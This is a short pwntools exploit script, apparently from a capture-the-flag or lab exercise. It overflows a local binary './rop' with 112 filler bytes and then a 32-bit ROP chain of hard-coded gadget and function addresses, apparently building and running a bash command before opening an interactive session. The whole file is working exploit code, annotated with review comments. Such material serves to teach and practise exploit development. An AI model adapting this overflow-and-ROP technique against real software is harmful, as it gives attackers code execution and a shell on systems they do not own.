#!/usr/bin/python

from pwn import *

def main():
    """Start ./rop as a local child process and send it an overflow payload.

    The payload is 112 filler bytes followed by nine 32-bit packed words.
    The words appear to follow the usual 32-bit stack-argument layout:
    address to call, address to return to afterwards, then argument words.

    NOTE(review): all addresses are hard-coded absolute values. They
    presumably match only one specific build of ./rop loaded at a fixed
    base (for example with ASLR disabled); confirm before trusting them.
    The 112-byte offset is likewise tied to the target's stack layout.
    NOTE(review): this is Python 2 code (raw_input, and a str joined with
    the output of p32).
    """
    target = process("./rop")

    # Addresses inside the target. Judging by the names, the first two are
    # "pop; ret" / "pop; pop; ret" gadgets and the rest are functions of the
    # binary -- TODO confirm against a disassembly of ./rop.
    pop_ret = 0x565555c3
    pop_pop_ret = 0x5655561a
    exec_string = 0x5655554d
    add_bin = 0x56555578
    add_bash = 0x565555c5

    pieces = [
        # Filler up to the saved return address (offset presumably measured
        # against this build).
        "A" * 112,
        # First call: one placeholder argument word, skipped by pop_ret.
        p32(add_bin), p32(pop_ret), p32(0xdeadbeef),
        # Second call: two placeholder argument words, skipped by pop_pop_ret.
        p32(add_bash), p32(pop_pop_ret), p32(0xcafebabe), p32(0x0badf00d),
        # Final call; nothing is placed after it.
        p32(exec_string),
    ]
    payload = "".join(pieces)

    # Print the child's PID as the prompt and block until Enter is pressed,
    # presumably to leave time for attaching a debugger to that PID.
    raw_input(str(target.proc.pid))

    # Deliver the payload to the target's stdin.
    target.send(payload)

    # Hand the session back to the user.
    target.interactive()

# Call main() only when this file is executed as a script, not when it is imported.
if __name__ == "__main__":
    main()

